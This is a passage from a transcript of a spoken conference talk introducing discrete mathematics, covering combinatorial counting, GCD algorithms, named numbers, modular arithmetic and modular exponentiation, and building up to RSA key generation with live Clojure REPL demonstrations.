that stuff fits together is totally cool. Now, was that a question or was that a? No, okay. That was a bid. This was an auction. You would now, like it or not, you would have the winning bid. All right. Now, the way I think about stuff is I say, hey, a talk on discrete math, that sounds fun. Let me do that. And I sat down to make an outline. I usually use like a mind mapping tool. And I said, well, if I'm going to talk about the discrete math, I have to think about what's math. And I went down that path a little bit and I realized I really don't want to go down that path. Okay, that's not a pleasant thing. It's actually a really cool thing, but you know, that would go off the path a little bit. That's a question for philosophers to ask. Mathematicians can't tell you what math is. Philosophers of mathematics have to tell you what that is. So let's just assume we sort of know vaguely what math is. We have this idea in our head. Discrete math is a subset of math that, in principle, it deals with whole numbers. And you can do an awful lot of fun stuff with whole numbers. So this is math with integers. There's also this subset of discrete math that we'll call number theory. There's some neat stuff in here. A lot of number theory, at least by my estimation, a lot of it is just fun. It's just like, oh, neat. You can do that with numbers. That's kind of cool. And we'll do some of those cool things with numbers. Just, you know, look around. And then modular arithmetic is a big part of discrete math. And there's a lot of interesting, you know, theorems that have been proved and things that are still being worked on. And this is where the RSA theorem lives, under the heading of modular arithmetic. All right. There's a bunch of modular stuff that gets done. And in some cases, some 250-year-old findings in discrete math get pulled in. And then some newer things, and they all get combined, and we get an internet out of it. So it's pretty amazing. That's not true that we get an internet. We get a commercially useful internet out of it. We would have had an internet if there had never been any public key cryptography. It just, you wouldn't buy things with it or send things that were secret. That would be sort of hard. So that's kind of our plan. Now, graph theory is also very much properly a part of discrete math. We're not going to talk about that in this talk. If, here's a shameless plug, 8,000 miles from here in July, if you're going to be at OZCON, I'm going to have sort of a follow-up talk to this that's on graph theory. So if anybody's planning on being at OZCON, I'll see you there in Portland. We can get a donut together. All right. A couple of things that I want to point you to. These slides will be available somewhere, and there's places you can get this online. But that course right there is a series of video lectures by a company. It's, you buy it for like 50 bucks. You download the videos. A company called The Teaching Company, and it's this crazy guy named Arthur Benjamin. He's a professor of mathematics at Harvey Mudd College, and he is amazing. So this is 24 30-minute lectures kind of on the whole span of discrete mathematics. And he's this like really geeky guy who is passionately in love with this material, and he gets all excited. And you know, sometimes his tie is like off, and it just bugs the daylights out of me. I'm like, no, isn't there a producer on set that could straighten up for 30 minutes? You're going to watch his tie be off. But he's amazing. He's a great teacher, and a lot of this material is taken from this. So if you want more, go check that out. Finally, that link right there will take you to a TED talk of this man. If you want to get a taste of what he's like, he does all this mental math stuff. Apparently he has a whole course on how to do calculations in your head. I haven't taken that course because I don't care. But he does, and he does like this magic show. He dresses up like a magician, and he gets somebody in the audience to give him a seven-digit number, and he squares it in his head. He is not normal, but anyway, just some acknowledgments to him. If you want more along these lines, and you don't want it out of a textbook, it's a good way to get it. So let's get started by talking about how to count. When you have collections of things, and you want to kind of draw from that collection of things in various ways, it's interesting to know how many different combinations and permutations of things you might get. So there are four different ways of counting that I'd like to talk about. I would like to talk about sequences, arrangements, subsets, and multi-subsets. Now, the best way to do this is probably to frame the discussion in terms of ice cream. I find that to be something that most people find accessible. Right? And again, this is stuff that a lot of us, we've done this math if you come from a computer science background, but I'll just kind of go over it again. Now, a sequence. Let's talk about a sequence. Sequences, you may have heard them called permutations or permutations with repetition. All right? And so a sequence of things is when I'm drawing from some collection, and the order in which I draw things out of the collection matters, and I can draw the same thing out of that collection more than once. For example, digits in a numbering system that uses place value. So imagine I have this bucket of the digits 0 through 9, and I have an infinite number of all those digits. Well, I can pick a digit out of there, it's a 5, I can put it down. I can pick a digit out, it's a 1. I can pick another digit out and a 1. And as I place these digits, I'm making a number. And the sequence of those digits matters, and of course, when I'm writing a number, I can repeat numbers. So numbers are sequences. But again, I said ice cream. So let's say I have n flavors of ice cream. I want to observe. I've been to Oslo half a dozen times. I've eaten ice cream in this city, but I don't recall seeing a lot of ice cream shops. Is that a thing? Is it there ice cream shops? Can we go get ice cream later? No. It exists, maybe. Okay. So, well, this is a really popular thing in America. Will there be an ice cream shop with 20 or 30 different flavors? And there's kind of this ice cream store motif recently where there's all these flavors and there's this big slab of polished granite that's refrigerated. There's this cold marble slab or granite slab. And they take the ice cream and they mix it on the slab and put like candy and fruit and things like that. And just chop it up and make it. Am I right? I mean, I'm selling you on this, right? This is a good idea. So imagine that kind of thing. You have n flavors of ice cream in these buckets, and there's this marble slab, and we're mixing them. And I'm going to pick, so I can mix them together and make a homogenous mixture. That would be not discreet. Okay? That would be in the realm of infinite math or continuous math. We don't want to mix them up in a bucket. We're going to pick K of these flavors and make a cone. So the order in which I take the flavors matters, and of course, I can get more than one scoop. So I could get three scoops of cheesecake. That would be a winning combination in my mind. I could get a scoop of cheesecake, a scoop of cookie dough, and a scoop of cookies and cream. And the order in which I put them matters. It's a different cone otherwise. So that's a sequence. And the number of different sequences I have is simply n to the k, not a surprising result. All right? If I have five digits, if K is five, and I have two possible digits, like I'm writing a binary digit, that's two to the five. That's 32. I can have 32 different five digit binary numbers. N to the k for sequences. That's an easy one. All right, let's go on. And let's look at arrangements. Now, an arrangement is ordered still. So the order in which I pick things matters, but I'm not allowed to repeat. So instead of an infinite bucket of ice cream, I have just one scoop of each. And so if I take a cheesecake scoop, I can't take a second one. A second one has to be some other flavor. N flavors, I'm picking K, and I'm making a cone still. So order matters. But like dad's in a weird mood, and he won't let you get the same flavor twice or something. Imagine that. Now, the calculation there is a little more complex. I've got n factorial over n minus k factorial. That's how many different arrangements. Or permutations without reputations. So these are both permutations. Now, there's a repository. Let's see here. Can you, you can see that. I am going to just make that font a little bigger. And I'm going to reposition that window so that everybody can see how's that. Good deal. All right. There's a repository on GitHub. It's linked in the slides. That's got for all of the interesting functions I'm going to be calculating here. There's some closure code that, I'll put this over here also for you to see occasionally if we need to refer to this. There is some closure code that gets this done. And I'm not going to spend a whole bunch of time stepping through that. But every once in a while, just to keep our feet on the ground, I'll run some code. So if you have, if you want to count how many different sequences you have, and I'm going to say we have 23 different flavors of ice cream, and I'm going to get three scoops of my cone. That's 12,167 ways to eat ice cream. And if I'm not allowed to repeat anything, then I have only 10,626 different ways to eat ice cream. Now that N there, that's just an implementation artifact of the closure repl. What that means is internally in that function, the JVM, closure is a language of the JVM, so it's compiling it to Java byte code. And it decided to use internally an arbitrary precision integer class, because the number got really big. Internally, that's N factorial over N minus K factorial enclosure there. N factorial is real big, right? So it's going to have to, that's not going to fit in an integer. See how big that is? Oh, wait. There. That's a big number. So occasionally, you'll see a little N, random N thrown on the bottom. When I do these, don't worry about that. Nothing to, nothing to get upset about. All right. So you got sequences, you got arrangements, and you have subsets. Okay, subsets are also called combinations without repetition. So here, order doesn't matter, but I'm still not allowed to repeat. This is like they only have one, one scoop left of all the flavors, and instead of a cone, I'm going to make a bowl. I'm going to stick them in a bowl so the order doesn't matter. Now, this is kind of a special, a special way of counting. It gets its own notation and its own name. It looks like that. We draw it like that. An N with a K or, you know, number with a number below it and big parentheses around the two. And we read, we can read that in two ways. It's called the binomial coefficient of N and K. And so I could say the binomial coefficient of N and K every single time if I wanted to, or I could simply say N choose K. All right. Now N choose K fortunately has a closed form definition. It looks kind of like arrangements, but it's not quite the same number. N factorial over K factorial times N minus K factorial. Now, binomial coefficients are, they, they pop up in lots of places in discrete math. They just, you'll see like some graph problem and you're working out the, you know, the computational cost of doing something with the graph and all of a sudden this binomial coefficient pops up out of nowhere. They're just a thing that happens. Let me, let me go over and calculate one here. So this function is called binomial coefficient. And the binomial coefficient here would be 1,771. That's the number of different ways I can make a bowl of three scoops out of 21 flavors of ice cream if I can't repeat. Now the place where it shows up suspiciously is Pascal's Triangle. So Pascal's Triangle is the thing that often elementary school kids or kids in their first few years of math will do some exercise and compute that because you can do it by just starting writing some numbers and then doing addition. You can do it sort of iteratively a row after row after a row looking up at the row above you. In fact, I have locked in my head. I must have been in an elementary school classroom at some point in the last few years because now every time I think about Pascal's Triangle, I think of this triangle of sheep with numbers written on them. So it was some, you know, eight-year-old kids making Pascal's Triangle. Anyway, Pascal's Triangle is made out of binomial coefficients. All right? So the nth row of Pascal's Triangle and the kth number in is the binomial coefficient of n and k. And I've got a function here. It's actually a sequence. I don't need parentheses on it. That is, in closure, an infinite lazy sequence of Pascal's Triangle. So if I hit that, it would start and it would just never stop. And that would be, I think, unstimulating for all of us because we would not want to see all that much of it. But, you know, I can take the first ten rows of Pascal's Triangle and those things in parentheses are lists of those numbers. You can see them walking through there. If we went to, you know, we could eventually find the 23rd and you'll look in there and at some point you'll find our number, which I won't trouble you with, but 1771 is our count there. This is an important thing that comes up in other places. Important enough that it gets its own name. Subsets. Now, it seems like discrete mathematicians kind of ran out of creative gas here because after subsets you get multi-subsets. You know, gee, that's kind of an original name. But this is just another unordered collection where you can repeat. You can pick the same thing twice. So this can also be called, you may have seen this called a combination with repetition. So in the ice cream case, again, n flavors of ice cream out there, but there's an infinite sump of ice cream, fortunately, in each bucket and I can get, I can make a bowl of k flavors and I can repeat if I want. Now, they really ran out of creative gas when they came to the notation because instead of, of, binomial coefficient, they're like, yeah, let's just throw another set of parentheses on there. It's fine. And you read that as n multi-choose k. Fortunately, multi-choosing is defined in closed form in terms of the binomial coefficient. So n multi-choose k is simply n plus k minus 1 choose k. So simple enough. And that, that function therefore is easy to calculate. And we'll say multi-subset count of 23 and 3 is 2300. So a few more choices because I can repeat. So just to go over those again, we'll have sequence count, arrangement count, and array, there are more arrangements than sequences, binomial coefficient, and multi-choose a few more than that. So that's all the different ways to eat ice cream. That's counting. Now, there's more to say about this. There's, there's more that we can do with different kinds of counting. And there are other formulas, some of which only have recursive definitions. You know, they're not these nice, clean, factorial things that are comparatively easy to calculate. So some of this stuff gets expensive to calculate. But we'll, we'll stop there. We'll stop counting there. And we'll go on to number theory in brief overview. All right. So my, my youngest daughter is 15 now. And so she just finished algebra. She does not have a warm relationship with math. I've tried to encourage her to have a warm relationship with math that math, you know, if you have kids and they don't like math, math does not need to be their best friend. But it's never their enemy. You know, it really, it does want good things for them. And it's, it's a useful tool. And I've tried to tell my kids this. And they haven't all really loved math. That's okay. She doesn't, she doesn't get along well with math. And, and long division, you know, attention span is hard for her. Long division, the algorithm that we had is brutal. Okay. You got to juggle a lot of balls in your head. And it really is hard for kids to learn. She's done with that. But I want to go to something even more basic. Not, not that the algorithm we use to divide long numbers on paper, but just the, the theorem that establishes what division is. It goes like this. Imagine that you have two integers. Call them A and D. All right. The division theorem says that there are these two other integers, Q and R, such that this. Easy enough. The way we might think about that is A divided by D equals Q plus some remainder. Right? That's the, that's the division theorem. Division is this thing. A equals DQ plus R. All right. We'll, we'll see if we can work with this. Now, that lets us think about the concept of divisibility. Now, divisibility simply takes the division theorem, A equals DQ plus R, and zeroes out R. All right. So, a number is divisible, divisible, that is, A is divisible by D, or D divides A if A equals DQ and R is zero. All right. That's, that's what divisibility means. We will note this like this. D pipe A. D divides A. A is divisible by D. I could take A divided by D and I don't have a remainder. So, that's an interesting pair of numbers if D divides A. And we're going to need that. This is one of the, the blocks we're going to build on. All right. For, for example, this lets us now think about greatest common divisors. Now, there was a problem when finding, there was a time in your life when finding the greatest common divisor of two numbers was a pressing existential concern for you. All right. When you were 10, 11, 12 to get through the homework set to simplify the dang fractions, you had to find greatest common divisor. Didn't you? It mattered. It was a pain. Well, we'll note this. The kind of the long form is like this, or simply most of the time, X and Y in parentheses. We're going to say that evaluates to the greatest common divisor of X and Y. So, there was, again, a time when I, this was a problem for me and I had to solve this a lot to do my math homework and I didn't like it. And so, I had a Commodore VIC-20 and a basic interpreter and I wrote a rather in elegant program that got this job done for me. It was great. It was like, oh, blasting through these fraction problems. You know, I still did the rest of the work, but I'm not going to find the greatest common divisor. Please. That's for a computer to do. I never, until like a year ago, I never stopped to consider the ethics of doing that. I'm like, is that cheating? I don't even know. You know, I just, I thought I'm going to do this. And I thought if any of my kids had written code to automate fraction problems, I'd be okay with that. Like, yes, you pass. All right. We're going to come up with a better way. So, my algorithm was stupid, right? It was find all the divisors, start at one and walk through and find all the divisors and compare them and see which one's bigger. You know, that's a brute force kind of way to do it. We're going to come up with a much, much cooler way, fortunately, because we're going to need to find greatest common divisors efficiently later on. All right. Bezu's identity. This deals with greatest common divisors. So, Bezu's identity is this. Imagine that you have two integers, A and B. Whose greatest common divisor is a number G. All right. Bezu's identity, so, you got those numbers. Bezu's identity says there are these other two integers, not necessarily unique, but there are these other two integers, X and Y, such that AX plus BY equals G. Okay. That's Bezu's identity. Now, we're going to want this. Please remember this, because in the middle of the RSA stuff, you're going to see an expression that looks just like that. All right. It's going to be a special case where G is equal to 1. That's a mildly interesting case of Bezu's identity when G is 1. But we're going to have this thing, or AX plus BY equals 1. Imagine you knew, so G is 1, and you knew A and you knew B. It would seem like a big pain in the butt to figure out what those X and Y might be. Bezu is saying that they exist, but like, what are they? I don't know. Well, there is an algorithm called the extended Euclidean algorithm. That's this nifty little recursive thing that lets us fairly efficiently figure out what X and Y are. And we'll not walk through all the steps of that algorithm, but I will run it, and I will abuse you by showing you code that does it. And if you don't know closure real well, the code is abusive, but I'm going to do it. It's going to be brief. Don't worry. That'll happen later. So Bezu's identity, extended Euclidean algorithm, keep these balls in the air. We're going to need them. So, and here's the thing. So discrete mathematicians in days of YOR were not thinking about search engine optimization. And this is bad. Okay. You need to be thinking about easily Google-able things. I was just talking about what algorithm, the extended Euclidean algorithm, to solve Bezu's identity. Great. Okay. Now we have Euclid's algorithm. Really? Okay. You should have had marketing look at this, because that wouldn't have happened. They would have had better names. Euclid's algorithm is an entirely different thing, but let's look at it. For A, B, and some fool number X, all right, you've got an A and B, and you want to find their greatest common divisor. That's the problem we're trying to solve here. Pick A and B, and then X. You just guess at some X, and a good place to start maybe is A divided by B, just the integer portion of A over B. Pick an X, and then do this. The greatest common divisor of A and B is the greatest common divisor of B and A minus BX, recursing on that, with picking kind of this big-ish X, until we find B equal to zero. All right? So just recurse, probably only takes a few steps. When B is equal to zero, whatever A you have is the GCD of A and B. Neat, huh? That's way better than what I did when I was 10 or 11. And I think I feel okay about that. I've come to terms with the fact that I had an inelegant algorithm when I was a little boy. This is better. But we can do one step better. That's Euclid's algorithm. There's also, if we could peek ahead a little bit, the modular addition of Euclid's algorithm. Now you guys all know what modular arithmetic is. You know what the mod operator is in probably several languages each. We get it. That's the remainder portion of when you do a division. So check it out. Greatest common divisor of A and B is the greatest common divisor of B and A mod B. So we don't have to pick that weird X anymore. We just say B and A mod B. Same thing, recurse until B equals zero, whatever you have left for A. That's what you got. Let's play with that. Just to keep our feet on the ground, REPL and code will help us. So let me clear this out. And guys in the back, is that the font size? Are you okay? You all right? All right, good. Yeah. So I have a function called greatest common divisor that does that modular addition of Euclid's algorithm. Even if you don't know Lisp at all, any Lisp, you can kind of get a sense of how this might work. If B is equal to zero, then stop with your A. Otherwise, recurse. Do a tail call and call yourself with A or B and A mod B. So let's see. The greatest common divisor of 54 and 9 is, I'm shocked it is 9. What about 55 and 9? It's 1. So if the greatest common divisor of two numbers is 1, then we say that those numbers are relatively prime. Or I said that in front of my older daughter once after she had been through prime numbers and she's like, what? Well, it's like kind of prime? I mean, it's prime on Tuesday. What does that mean? Prime relative to one another. Or you could say they are coprime. So 55 and 9 are coprime, meaning they have no common divisors other than 1. And you can have fun with this. So I could say, you know, big, long numbers and T is actually not a number. And oh, look, I just found two coprimes. Not surprising, I guess, because the end is there, no. And you could play, whoa, okay. Hey, I've probably given this talk like 10 times or so. And I do this, right? I just, you just make numbers up. It is very hard to find greatest common divisor is that big. If you just generate random numbers, you're usually going to find 1, 2, 4, 3. It's tough to come up with big common divisors. I'll say that again. It's tough to come up with big common divisors. I didn't mean clap for me. I meant, it's a mathematically important result. But thank you. That was great. It's mathematically important that if you've just got big random numbers, it's not necessarily easy to come up with big random numbers whose common divisors are large. We're going to see that play out later in public heat cryptography. So. So you can make a note for those. Yeah, yeah, hang on. This is going to, over here, that's going to my notepad. All right, good. Thanks, guys. I'm glad we could have this, this time together. Let's talk about numbers with names. Now, if you come to a talk at a conference called discrete math, you are probably also the kind of person who would find yourself on Wikipedia clicking around for a few hours on numbers that have names. Okay, like evil numbers and, and, and abundant numbers and Carmichael numbers and a lot of them have mathematicians names on them. Most of them serve no purpose. I'm convinced they serve no purpose other than publication, right? Like if I could have burgland numbers, I'd be okay with that. I feel that would be a good thing. So I think mathematicians invent these categories so they, oh, here's nobody's come up with this. That's my number. But anyway, it's not so weird. There are some categories of numbers that are named, like even numbers and odd numbers. That's totally everybody gets that. Okay, those are numbers with names. We know what those are. We've talked about prime numbers. That's a, that's a group of numbers. That's a named group of number and all of the integers that aren't prime are composite. All right, great. Now, it gets weird after that. So perfect numbers. You know, how, how, how do you use perfect numbers to promote science and the useful arts? I'm not sure, but they're really cool. All right. And let's just, let's just poke around a perfect numbers a little bit. Now, a perfect number is, let's just define this. We've got some source code here for this function called perfect. It takes a predicate and returns a Boolean. It's a number which is equal to its own aliquot sum, to which you say, oh, why didn't you just say so? What's an aliquot sum? All right, well, let's look up the source for the aliquot sum, whatever that is. Okay. Well, reduce plus proper divisors. That is, the aliquot sum of x is the sum of x's proper divisors. X's proper divisors are integer divisors. All right, so we'll say, for example, the proper divisors of 10 are 1, 2, and 5. Easy enough. And what would the sum of 1, 2, and 5 be? 8. Well, is 10 perfect? You already know it's not. So there you go. That's what a perfect number is. Who cares? I don't know. The first perfect number is 6. A good number of perfect numbers are known. Now, I have an infinite lazy sequence of perfect numbers, which again, as soon as I type that, we'll just start creating all of them. I'm going to just take the first five of them and you, oh, oops, that takes a minute. See, there, apparently, my means of discovering perfect numbers is not very efficient and it actually is difficult to discover perfect numbers. The sixth perfect number, I think, takes longer than the rest of the session. I've never waited for it. So it takes a long time to calculate those. But those are the perfect numbers. Now, abundant numbers, that was our next category. A number is abundant if it's a laquat sum is, or rather, if it is greater than its own a laquat sum. It's deficient. It's deficient if it is less than its own a laquat sum. So those are a little more plentiful. You kind of find those lying all over the ground. The first 100 and then the first 100 abundant numbers, they're all over the place. You see abundant numbers are apparently a little more abundant than deficient numbers because the 100th one, you only get to 133 and the 100th deficient number, you get to 416. Go ahead later, look up the Wikipedia page for perfect numbers and you'll see the highest known perfect number, the number of digits it has, who discovered it and in what year. Typically for the Wikipedia pages, for the named numbers that are interesting, you'll get a little list. You can get your name in mathematics history by writing a Hadoop job that does that. So there you go, perfect named numbers. Now, a slightly more interesting class of numbers is the Carmichael numbers. Now, telling whether a number is prime is difficult. The only way to know for sure is to look. You've got to divide, if it's a big number, you've got to divide it by a bunch of numbers and you get to the end and you're like, okay, I didn't find anything that worked out this must be prime. So you kind of have to search exhaustively. There are a number of probabilistic prime methods, prime proofs or detectors, they're not proofs, but they tell you whether a number is probably prime. So you have Fermat's test for primality. It's pretty nice, it's pretty quick and it tells you whether a number is probably prime by saying, well, is, n is prime if 2 to the n mod n is equal to 2. Basically, if a to the n mod n is equal to a, that's Fermat's test for primality, that means the number is probably prime. Some prime slip through there, those are the Carmichael numbers. So if you could cheaply calculate all the Carmichael numbers, you could use that with Fermat's test for primality and you'd be in good shape. Unfortunately, you can't cheaply calculate all the Carmichael numbers. You have to use Fermat's test to figure them out, but that's just an example of another category of named numbers. This is important, this probabilistic prime primality test because later on we're going to have to generate random numbers and tell whether they're prime. I'm going to save you time by generating them myself from my notes, but in real life when you're generating a key pair in, like with open SSL or something, it has to go generate a random number and see is this random number prime and it needs to use efficient probabilistic methods of telling whether it's really seriously probably darn sure prime and that's how they work. And you could look up the details of how various encryption implementations do that. They typically combine a few probabilistic prime tests each, Fermat's test being one of them. Okay. We're doing on time. We got 23 minutes left, which should be just right. That brings us to modular arithmetic. Again, we're programmers. We know what this is. A mod B gives us the remainder when you divide A by B. Simple enough. But there's a little more to be said here and really funky things happen. And I think there's a slightly more evocative way to think about modular arithmetic. First, a lame formula. This is the formal definition of modular arithmetic. Oh, and by the way, where does this get used in real life? All over the place. Like, what time is it right now? It's 1657. How many hours since the beginning of the epic? You don't know. You'd have to write code to figure that out. That's because we only count time mod 24, where I live mod 12. So clocks do this. What day is it since the beginning of the epic? You have no idea. You would have to do some math and write some code to figure that out because we do months and days mod 12 and mod various other strange things. So this happens in the way we count time. It's a thing that we do. And basically this was the idea of Gauss, like a lot of other discrete math and fundamental stuff in discrete math. But we're going to say that A is congruent to B mod M. It's the three lines we say that we talk about congruence, not equality. If that expression is true. Now that is so counterintuitive, you can't even believe it. That's the formal definition of congruence or modular equality. Let me give you a better way to think about that and then an even better way to think about that. A is congruent to B mod M if A mod M equals B mod M. That's kind of what you'd think modular equality or congruence is. Here's an even cooler way to think about it. This is how I would explain modular math to somebody who had no idea what it meant. Imagine you have a pair of magic goggles that you can put on. You look around without the numbers, you look around or without the goggles, you see numbers places. You look down, there's a number written, you see the actual number. You place these goggles on, it's got a little dial on the side that's your M dial. You could dial that to say six. And when you do that, you look at a number, you don't see the number, you see the number mod six. Okay, so modular arithmetic is kind of like arithmetic with these mod M glasses on. You could dial them to whatever the modulus is going to be. All of the numbers in the world just change to their modular equivalents. So addition works in modular arithmetic. If A is congruent to B and C is congruent to D mod M, then A plus C is congruent to B plus D mod M. Vaguely intuitive. We kind of expect that to work. Multiplication works. We can get a way of multiplying. So if A is congruent to B and C is congruent to D mod M, then A times C is congruent to B times D mod M. So you get some just fundamental stuff that you can do by putting these mod M glasses on. Now, let me show you a fun thing that we can do with this. I want to show you an algorithm first called seed planting. And there's nothing particular, particularly modular about this algorithm, but then I'm going to tweak it with a modular addition. And this is another little tool that we're going to be super glad to have in a few minutes. Let us suppose I want to raise a big number to a big number. That's important to me. And for our example, I'm going to pick, seven's not all that big, but 103 is pretty big, right? That's 103 multiplications. That's a lot. So I'm going to raise seven to the 103rd power. The seed planting algorithm works like this. Now, 103 in binary is 1100111. Take my word for it. Totally is. And I'm going to start, I'm going to put a little one down here in the corner. And that's going to be sort of my accumulator. We're going to keep track of numbers down there. So I'm going to start with a one. Then I'm going to go to my most significant bit in my exponent. That's a one. What I do for every bit is I'm going to take what's in my accumulator and square it. One squared. That's one. I see a one in my exponent. So I'm going to multiply times my base. I'll say times seven. So one squared times seven. That's seven. Well, good. Seven goes down into the accumulator. Next digit. Seven squared. That's 49 times seven because I see a one there. That's 343. Awesome. All right. 343 goes down to my accumulator. I scoot over to the next digit. That's a zero. Well, I still square what's in my accumulator. 343 squared, which is 117,649. But I see a zero, so we do not get the bonus seven at this point. All right. Next digit squared again. We're getting a little out of hand here. I'm going to stop reading the numbers because it gets to be unwieldy. And next digit, I got to throw in another seven there because I see a one and another seven and another seven. And I get a result. You know, that's cool. So seven to the 103rd power is this. All right. I'm glad that we know that. What I have there, though, is a way to do that in fewer multiplications. 103 multiplications is not a big deal if I only have to do it once. But, you know, maybe many millions of multiplications or billions of multiplications might be a problem. And if I can basically hack that down by log two, I'm going to be a pretty happy camper. So this is a nice algorithm for doing big multiplications. I'm still going to be in the realm of arbitrary precision integers here. There's no machine word that's going to keep track of that for me. So this is going to be fairly slow math. But suppose, I wanted to show you that algorithm because we're still talking about modular stuff, suppose what I really want is a to the b mod m. All right. I want seed planting, the modular addition. So we're going to do seven to the 103 mod 53. There's our exponent again. And here's how the game changes. There's a one down there still. We'll say one squared times seven. Ah, mod 53. Every time we throw that mod in there. Well, that's seven. So seven goes down into the accumulator. Seven squared times seven. Mod 53. That's 25. You see, the numbers don't get all that big. They stay small. I might still have to do a few multiplications. Potentially, if a and b, you know, seven and 103 and the modulus, if those are big numbers, maybe I still need to use arbitrary precision integer classes to get this work done. But my numbers stay much smaller. I'm going to do less work. And I end up with 38 is my answer. So now you know seven to the 103 mod 53 is 38. And you can get some idea. Now, these are pretty small. So we have just the regular power seven to the 103. It takes a quarter of a second. And these are kind of small for the timings to matter. Yeah, you'd need bigger numbers. So don't let me time these. That's kind of silly. But I can take the timing away and just say, there you go. That's 38 with the modulus in there. And that's our power by seed planting. And I could say, well, what's the power, what's that mod 53? You know, I could do it the long way and then get the result. And I still get 38 as an arbitrary precision integer. So, you know, these things, these algorithms work. And we might want to have one in our pocket in just a minute. If I could, if I could introduce one more function, and that is called Euler's Toshant function, all right, we need this guy, usually just denoted as phi of n, all right, phi of n, that's Euler's Toshant number. And that's the number of numbers between one and n, which are relatively prime to n. Crazy, right? Who cares? Well, three mathematicians in the early 70s cared a lot. And I have this just called phi, and that's some relatively nasty closure code. But say the Toshant of 10 is 4, because there are four numbers in between one and nine inclusive that are relatively prime to 10. That's the Toshant of 10. Yeah, that's like, that's another ball to keep in the air. We're going to need that if we're going to do this. So, let's talk about RSA. We're going to combine all these pieces together. We're going to work out how to create a public and private key pair. It's not just any two numbers. And it's not just two primes. There are some other special things we have to do. That's kind of hard, okay? It's going to be weird to go through all that, to keep all this stuff in your head. What's not hard, and what I think will be mind-blowing at the very end, is when you see just how simple the math is. When you've got the key pair and you see the calculation that you do on the numbers that you send, that should leave you just a little bit mind-blown. And then you can go. And it's almost dinner time. So, that'll be great. All right. As a reminder, this public key cryptography by these three guys, Rivis, Shamir, and Adelman in 1972, or sorry, part of 1977 they published. There was, it was subsequently discovered, a British guy who discovered the same, proved the same theorem in 72, but it was classified. He couldn't publish it. So, poor guy. He doesn't get his name on the algorithm. But yeah, what we do is we generate these two keys, and if you want to send me a message, you take my public key and encrypt that message with my public key. I get the encrypted message, and I use my private key to decrypt it. All right. So, my public, I generate these two numbers. I give the world my public key. I keep my private key very secret. And when you want to send me something, you use my public key to do it. If I want to send you something, I have to have your public key to do it. So, it only works for you to send me stuff. You encrypt my public key. I encrypt with my private key. So, here is how it works. Pick two big primes. Let's call them P and Q. What does big mean? All right. Big, you should ask a cryptography person, which I am not. There are people who give their whole lives to keeping up to date on what's going on in the implementations of the various algorithms and the actual libraries that we use as developers to do this stuff. I'm not one of those people. I know some. But big has some definition. It's 512 bits, 1024 bits, it's 2048 bits. It just kind of depends on how much computing power people have floating around to try to factor your numbers. So, that's a relative term and it's a moving target. It's going to get bigger as computers get faster. And I think the paranoid right now would use like a 2048 bit key. The not so paranoid, maybe 512 bits. That's what I mean by big. But pick a prime. What does that mean? Generate a random number of a certain size. What does that mean? Okay, again, that gets into implementation things. What's random? You know, you have to be careful about whether you're giving up any information in your random number generator. So, let's just say you've got some way of generating a big random number and then you use these probabilistic prime detectors to give you a good idea whether it's really probably okay that it's prime. You're almost sure. Two big primes, P and Q. Please multiply them. P times Q equals N. N is a number that we're going to use for the rest of this exercise. Now, if all you have is N and it's big, it is apparently an immutable fact of the created universe that it's really hard to figure out what P and Q might be. That's the whole thing here. If N is actually the product of two primes and I give you N, good luck figuring out what the primes are. That's the expensive thing. That's hard to do. If something were discovered that would make that easy to do, a lot of the world as we know it would collapse. I mean, I don't know if there could be war. I don't know. Seriously, that would be an incredibly consequential thing if somebody could figure out how to do that. But it's hard. If I give you N and it's P times Q, you have no idea what P and Q are without trying really hard. All right. So, you pick the primes, you multiply them. Good for you. Now, if you would please calculate Euler's totient of N, phi of N, and just keep that in your pocket. Now, that's actually expensive to calculate because you have to go through all the numbers between 1 and N and figure out whether they're relatively prime to N. That's a pain. Now, relative primality is not all that hard to figure out because what you really want to know is whether the greatest common divisor of the two numbers is 1 and we had Euler's algorithm for doing that recursively that you saw was pretty quick even when I had those big long numbers. It just returned right away. So, you know, that's cool but it still takes a long time on a big number. Now, fortunately, we have a hack because these guys are prime. The totient of N is P minus 1 times Q minus 1. You are glad of that because that's cheap to calculate. And this is key generation. So, even if there's some expense here, it's okay. You don't do this often. This is the thing that you have to Google how to make, how to do with open SSL every three years when you generate a new key pair because it's been three years and you totally forget how you did it last time. So, it's rare and it would be okay if there was some computational cost. All right. If you would please find another random number D such that it's greatest common device, such that it is co-prime or relatively prime to the totient you just calculated. So, all you've done so far is you picked two big primes. That was a bit of a pain. You multiplied them. You stuck that aside. You subtracted one from each and multiplied them and you stuck that aside. And now you have to go through a little bit of rigmarole where you're going to generate random numbers. You're going to say, here's a candidate D and you're going to use Euclid's algorithm to fairly quickly figure out whether its greatest common divisor with respect to the totient of N is one. Got it? So, that could take you a minute. You're going to have to try a few times on that. You'll throw away a bunch of random numbers. Not so bad though. Now, I've got something. D at phi of N equals one. That looks like the input to what? It was a half an hour ago. We're going to use the extended Euclidean algorithm in a minute because we have to solve Bezu's identity. Okay? This is A, the greatest common divisor of A and B. It happens to be one in this case. There's going to be an AX plus BY equals one. And maybe I want to know what X and Y are. So, let me show you how this works. Bring in that extended Euclidean algorithm if you please. AX plus BY equals one. Well, let's plug things in. I've got at the top D and phi of N. So, let's plug those in. D is going to be A. Phi of N, the totient of N is going to be B. Well, here's what happens. What do I need at this point? I still need another key. D, I picked D, that stands for decrypt. That's going to be my private key. But I don't have a key to encrypt yet. So, let me show you where that comes from. That's going to be X. X is going to pop out of the extended Euclidean algorithm and that is going to be my encryption key or my public key. And Y, or I'll rename it F, is actually waste heat that just gets expelled by this process. We don't care about that number at all. So, we pick either X or Y, whichever is positive. It doesn't matter. So, there you go. D times E plus phi of N times F equals one, extended Euclidean algorithm, and you go to town. It's incredible. There you have your stuff. And at that point, you take E and N and print them on t-shirts and put them in your email signature, do whatever you want with them. That's your public key. You want lots of people to know that. D and N, or you could say just D, is kept secret. That is your private key. And because of that, we have an internet. Now, let's, yeah, let's look at that. So, that's kind of hard, right? There's a bunch of pieces you had to mix together to make that happen. To send a message. So, I'm going to send you a number, and, you know, maybe it's text, maybe it's an image, whatever. It's a number. Okay, I make it into a number. And I'm going to call that number M. I take E and D and N. Those are the numbers I have to have lying around to encrypt and get the message I can send in the clear. That's all I do. M to the E mod N equals C. At that, the first time I saw that, that blew my mind. It's not hard. Maybe they're big numbers, and maybe it's a pain. Fortunately, I showed you modular seed planting a few minutes ago, and now you know how to do this quickly and efficiently without getting too carried away. But that's all you got to do. Then you can send C in the clear. And the only way to turn C back into M is if you know D. C to the D mod N equals M. And as a result of that, we get to have an internet. Now, let me, I got a few minutes. So let me just do that with some numbers. I have some numbers 